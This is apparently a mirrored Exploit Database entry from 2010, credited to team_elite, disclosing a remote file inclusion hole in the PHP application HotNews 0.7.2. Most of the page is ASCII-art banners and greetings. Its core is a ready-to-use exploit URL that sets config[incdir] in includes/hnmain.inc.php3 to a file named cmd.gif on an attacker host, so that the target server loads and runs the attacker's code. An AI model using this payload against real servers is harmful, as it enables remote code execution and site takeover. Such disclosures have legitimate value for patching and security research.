HotNews 0.7.2 – Remote File Inclusion

• Exploit Database
• 9 阅读

• 作者： team_elite
  日期： 2010-04-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12160/

• ================================================================================================
  ================================================================================================
  == @@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@ ==
  == @@@@@@@@@@@@@@@@@@@@@@@@ @@@	 @@@@@@@@@@@@@@@@@@@@@@@@ ==
  ==@@ @@@@ @@@@ @ @ @@@@@@@@ @@ @@ ==
  ==@@ @@@@ @@@@@ @@@@@@@@@ @@ @@ ==
  ==@@ @@@@@@@@@@@@@@@ @ @@@@@@@@@@@@ @@ @@@@@@ ==
  ==@@ @@@@ @@@@ @@@@@@@@ @@ @@ ==
  ==@@ @@@@ @@@@ @@@@@@@@ @@ @@ ==
  ==@@ @@@@@@@@ @@@@ @@@@@@@@@@@@@@@@ @@ @@@@@@ ==
  ==@@ @@@@@@@@ @@@@ @@ @@@@@@@@@@ @@@@@@@@@@@@@@ @@ @@@@@@ ==
  ==											==
  ================================================================================================
  ================================================================================================
  		 ||||||
  		 |||					|||
  [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  [[								[[
  [[ HotNews 0.7.2 Remote File Inclusion Vulnerability						[[
  [[															[[
  [[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ |				 	[[
  [[															[[
  [[															[[
  [[ ## Exploit:											[[
  [[															[[
  [[- http://[target]/[path]/includes/hnmain.inc.php3?config[incdir]=[attacker.com]/cmd.gif???[[
  [[															[[
  [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  		 |||					|||
  		 |||					|||
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~~~~Greetz and Thanks to: All member gcc, all member manadocoding ~~~~
  ~~~~									~~~~
  ~~~~MC & gcc team : team_elite , devilbat , zreg , doniskynet , 0pa ~~~~
  ~~~~thanks for : cr4wl3r [ http://shell4u.tk/ ]		~~~~
  ~~~~									~~~~
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  * -,
  * -@@ 
  * -@@#
  * -:@@; 
  * - @@@@@......`
  * -@@@@.@@@@@@@@@@@#
  * - @@@@@@@@@@@@@@@@@@` 
  * - @@@@@@@@@@@@@@@@@@@@; 
  * -#@@@@@@@@@@@@@@@@@ 
  * -`@@,@@@@@@@@@@@@@@@@@: 
  * - @@@+@@@@@@@ @@@@@@@;@@@`
  * - :@@@@@@@@@:@,; @@@@@@@ .@@
  * -@@@@@@@@@@@:@@@@@@@@@@ 
  * - @@@@' ` ` @@@@@@@@@:+.
  * - .@@@@@@@@@@@@@ .
  * - , +@@@@@@@@@@@@@
  * -+@@@@@@@@@@@@@@@@@@@@# 
  * - ,@@@@@@@@@@@@@@@@@ +@@@ 
  * -`@@@@@@@@@@@@@@@@@@@ @@@ 
  * - @@@@@@@@@@@@@@@@@@@ @@` 
  * -@@@@@@@@@@@@@@@@@@ @@
  * - +@@@@@@@@@@; @@@# @ 
  * - @@@@@@@@@ : 
  * - @@@@@@@@ ,@@
  * -@@@@@@@@@ @@@' 
  * -@@@@@@@`@ @@@; 
  * -@@@@@@@@ @.@@@@@@@@
  * -@@@@@@@@@@@@@@@@@@@@@@#
  * - @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
  * - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@
  * - @ @@@@@@@@@@@@@@@@@@@,@@@@+ 
  * - @@@@@@@@@@@@@@@@@@@@@@@ 
  * - @@@ @@@@@@@@@@@@@@@; @@@@ 
  * - @@@@@@@@@`@@@. @@.
  * - @@; @@@@#:@@@@@# @@.
  * - @ @@@: ;@ 
  * -;` @@ ;@ 
  * -@@@
  * - @#
  * - : : 
  * --------------------------------------------->>>> bugs found on 11 April 2010 by team_elite.